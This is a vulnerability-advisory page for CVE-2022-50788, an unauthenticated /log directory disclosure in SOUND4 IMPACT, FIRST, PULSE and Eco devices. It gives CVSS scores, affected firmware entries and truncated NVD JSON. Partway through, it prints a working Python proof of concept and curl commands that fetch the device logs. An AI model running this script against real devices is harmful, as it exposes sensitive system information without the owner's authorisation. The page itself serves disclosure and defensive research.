Security Vulnerability Report
中文
CVE-2022-50788 CVSS 7.5 HIGH

CVE-2022-50788

Published: 2025-12-30 23:15:45
Last Modified: 2026-01-13 15:09:39

Description

SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive log files. Attackers can directly browse the /log directory to retrieve system and sensitive information without authentication.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:first_firmware:1.69:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:first:1.0:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:impact_eco_firmware:1.16:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:impact_eco:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:pulse_eco_firmware:1.16:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:pulse_eco:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:sound4:big_voice4_firmware:1.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sound4:big_voice4:-:*:*:*:*:*:*:* - NOT VULNERABLE
SOUND4 IMPACT <= 2.x
SOUND4 FIRST <= 2.x
SOUND4 PULSE <= 2.x
SOUND4 Eco <= 2.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2022-50788 PoC - SOUND4 IMPACT/FIRST/PULSE/Eco Information Disclosure # Target: /log directory unauthenticated access def exploit(target_url): """Exploit information disclosure vulnerability in SOUND4 devices""" # Directories to check for log files paths = [ '/log', '/log/', '/logs', '/logs/', '/log/system.log', '/log/access.log', '/log/error.log' ] print(f"[*] Target: {target_url}") print(f"[*] Exploiting CVE-2022-50788\n") for path in paths: url = target_url.rstrip('/') + path print(f"[+] Checking: {url}") try: response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: print(f"[+] SUCCESS! Status: {response.status_code}") print(f"[+] Content-Type: {response.headers.get('Content-Type', 'Unknown')}") print(f"[+] Content-Length: {len(response.text)} bytes") print("-" * 50) print(response.text[:2000]) # Print first 2000 chars print("-" * 50) elif response.status_code == 401 or response.status_code == 403: print(f"[-] Access denied: {response.status_code}") else: print(f"[-] Not accessible: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") print() if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] exploit(target) # Alternative curl command: # curl -s http://TARGET:PORT/log/ # curl -s http://TARGET:PORT/log/system.log

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50788", "sourceIdentifier": "[email protected]", "published": "2025-12-30T23:15:45.390", "lastModified": "2026-01-13T15:09:38.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x contains an information disclosure vulnerability that allows unauthenticated attackers to access sensitive log files. Attackers can directly browse the /log directory to retrieve system and sensitive information without authentication."}, {"lang": "es", "value": "SOUND4 IMPACT/FIRST/PULSE/Eco &lt;=2.x contiene una vulnerabilidad de revelación de información que permite a atacantes no autenticados acceder a archivos de registro sensibles. Los atacantes pueden navegar directamente por el directorio /log para recuperar información del sistema e información sensible sin autenticación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-548"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:first_firmware:2.15:*:*:*:*:*:*:*", "matchCriteriaId": "FBDECDEC-C5A2-4B0D-B3E0-58CCCC804BCF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:first:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "4EF10967-A7DC-4DF0-94BE-935FFC1888D6"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:first_firmware:1.69:*:*:*:*:*:*:*", "matchCriteriaId": "713CC97E-CC0A-41B8-B8CA-EAD8F774F77C"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:first:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "C4034A51-85E1-44E7-973B-7BFFFB083832"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:impact_eco_firmware:1.16:*:*:*:*:*:*:*", "matchCriteriaId": "5ED99BE5-4598-4D5C-B0F0-3BE6E5B05C10"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:impact_eco:-:*:*:*:*:*:*:*", "matchCriteriaId": "B4B0A611-C50E-4397-ACDF-8D090D4AFC88"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:pulse_eco_firmware:1.16:*:*:*:*:*:*:*", "matchCriteriaId": "9A3C132F-ACCE-4618-8EC2-31624571F0BF"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sound4:pulse_eco:-:*:*:*:*:*:*:*", "matchCriteriaId": "71E155FD-162E-4EA9-9BD9-89384B3AD175"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sound4:big_voice4_firmware:1.2:*:*:*:*:*:*:*", "matchCriteriaId": "DFF4C955-E4AF-4A3A-89F9-481CE5DB7BF1"}]}, {"opera ... (truncated)